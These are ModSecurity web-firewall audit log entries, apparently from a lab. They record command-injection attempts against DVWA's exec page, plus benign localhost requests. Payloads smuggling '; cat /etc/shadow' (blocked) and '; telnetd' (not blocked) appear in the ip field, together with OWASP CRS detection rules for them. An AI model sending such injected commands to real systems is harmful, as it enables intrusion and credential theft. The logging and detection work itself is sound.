{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJAAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:57:53 GMT","If-None-Match":"\"15a-54f683559a2e3\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 14:34:24 GMT","ETag":"\"15a-54f68b7e775af\"","Accept-Ranges":"bytes","Content-Length":"346","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcZc38AAQEAAAmHBJAAAAAF\"]"],"stopwatch":{"p1":518,"p2":1131,"p3":58,"p4":149,"p5":54,"sr":58,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJEAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZc38AAQEAAAmHBJEAAAAF\"]"],"stopwatch":{"p1":624,"p2":1164,"p3":47,"p4":276,"p5":50,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJIAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZc38AAQEAAAmHBJIAAAAF\"]"],"stopwatch":{"p1":443,"p2":952,"p3":47,"p4":270,"p5":48,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:13 --0400","transaction_id":"WRczLX8AAQEAAAkW4RkAAAAB","remote_address":"192.168.75.145","remote_port":56752,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"43"},"body":["ip=%27%3B+cat+%2Fetc%2Fshadow&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":3732,"p2":8676,"p3":0,"p4":0,"p5":403,"sr":67,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:26 --0400","transaction_id":"WRczOn8AAQEAAAkXs@QAAAAC","remote_address":"192.168.75.145","remote_port":56754,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"31"},"body":["ip=%27%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczOn8AAQEAAAkXs@QAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":1011,"p2":2755,"p3":97,"p4":551,"p5":127,"sr":45,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:26 --0400","transaction_id":"WRczOn8AAQEAAAkXs@UAAAAC","remote_address":"192.168.75.145","remote_port":56754,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"700","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRczOn8AAQEAAAkXs@UAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":448,"p2":2424,"p3":111,"p4":911,"p5":90,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
